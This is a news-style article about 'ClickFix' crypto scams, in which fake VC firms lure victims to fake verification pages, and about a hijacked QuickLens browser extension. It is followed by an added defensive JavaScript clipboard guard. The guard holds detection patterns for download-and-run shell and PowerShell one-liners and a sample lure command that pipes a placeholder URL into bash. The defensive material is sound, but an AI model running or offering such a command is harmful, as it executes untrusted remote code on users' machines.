VCs That Rug Your Clipboard: How 'ClickFix' Scammers Trick You Into Doing the Dirty Work
Crypto grifters have leveled up their 'ClickFix' attack playbook, graduating from simple cons to full-blown VC cosplay, complete with hijacked browser extensions for extra spice.
According to the digital sheriffs at Moonlock Lab, these scammers are now LARPing as fake venture capital firms with names like SolidBit, MegaBit, and Lumax Capital—sounds legit, if you ignore the fact they’re about as real as a promised airdrop. They slide into DMs on LinkedIn with partnership offers, then funnel marks toward phony Zoom and Google Meet links.
Here’s where the magic happens. The victim clicks, landing on a page with a fake Cloudflare 'I'm not a robot' checkbox. Clicking it doesn't prove you're human; it just copies a malicious command to your clipboard. You're then gently guided to open your terminal, paste this 'verification code,' and effectively pull the trigger on your own digital foot. It’s the ultimate self-rug.
'The ClickFix technique is what makes the final step so effective,' Moonlock Lab noted. 'By turning the victim into the execution mechanism...the attackers sidestep the very controls the security industry has spent years building.' In other words, they’ve outsourced the hack to you.
Moonlock Lab points the finger at a character named Mykhailo Hureiev, listed as a co-founder of the fictional SolidBit Capital, who’s been the primary LinkedIn liaison. The whole operation runs on sophisticated, rotating infrastructure, swapping out identities faster than a degen rotates shitcoin bags once one gets doxxed.
In a parallel plot twist, crypto hackers recently went after a Chrome extension. QuickLens, a tool for Google Lens searches, got yeeted from the web store after being compromised—a reminder that even your browser helpers can turn to the dark side.
The cybersecurity firm Annex Security reported that after QuickLens changed hands on February 1, a malicious update dropped two weeks later. This new version came packed with scripts for ClickFix attacks and other info-stealing tools, netting a potential haul from its roughly 7,000 users.
The hijacked extension reportedly went treasure hunting for crypto wallet data and seed phrases—the holy grail. It also scraped Gmail inboxes, YouTube channel info, login credentials, and any payment details foolishly typed into web forms. A true data vacuum cleaner.
The ClickFix method has become a favorite in the threat actor toolkit since last year precisely because it makes the victim manually execute the payload. This cleverly bypasses standard security tools that might otherwise block automated attacks. Researchers have been tracking this grift since at least 2024, with targets now spanning from manufacturing and retail to government and energy sectors. No industry is safe from a well-placed self-own.
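The clipboard step described above is also the point where a defender can step in, because the command has to pass through the page's clipboard write before the victim ever sees a terminal. The sketch below is an added example, not code from Moonlock Lab or Annex Security: it scores text a page tries to copy and refuses writes that look like a download-and-run one-liner. The rule patterns, function names and sample strings are assumptions made for illustration.

```javascript
// Added example. Rule patterns are illustrative assumptions, not IoCs from the reports.
const EXEC_RULES = [
  ["download-piped-to-shell",
    /\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i],
  ["decode-piped-to-shell",
    /\bbase64\s+(-d|--decode)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i],
  ["powershell-download-and-run", // either order: "iex (iwr ...)" or "iwr ... | iex"
    /^(?=[\s\S]*\b(iex|invoke-expression)\b)(?=[\s\S]*\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b)/i],
];
// Wording a lure page uses to pass the command off as a check.
const LURE_RULE = /(not a robot|captcha|verif(y|ication))/i;

// Returns which rules fired and whether the copy should be blocked.
// Lure wording alone never blocks: a real one-time code is harmless to paste.
function analyzeClipboardText(text) {
  const indicators = EXEC_RULES.filter(([, re]) => re.test(text)).map(([name]) => name);
  const block = indicators.length > 0;
  if (block && LURE_RULE.test(text)) indicators.push("lure-wording-with-command");
  return { indicators, block };
}

// Wraps clipboard.writeText so a page script cannot silently stage a command.
// Assumption: this runs in the page's own JS context before the page's scripts.
function guardClipboard(clipboard, onBlock) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    const verdict = analyzeClipboardText(String(text));
    if (!verdict.block) return original(text);
    onBlock(verdict);
    return Promise.reject(new Error("blocked: " + verdict.indicators.join(", ")));
  };
}

// Constructed samples (placeholder host, not taken from any real campaign).
const SAMPLES = {
  lure: "curl -fsSL https://verify.example.invalid/check | bash # Cloudflare verification ID 48213",
  encoded: 'echo "ZWNobyBoaQ==" | base64 -d | sh',
  benignCommand: "npm install left-pad",
  benignCode: "Your verification code is 482913",
};

if (typeof navigator !== "undefined" && navigator.clipboard) {
  guardClipboard(navigator.clipboard, (v) => console.warn("ClickFix-style copy blocked", v));
}
```

This only covers the async `navigator.clipboard.writeText` path; pages that copy through the legacy `document.execCommand("copy")` need a separate `copy` event check, and the `onBlock` verdicts are worth forwarding to whatever telemetry the SOC already collects.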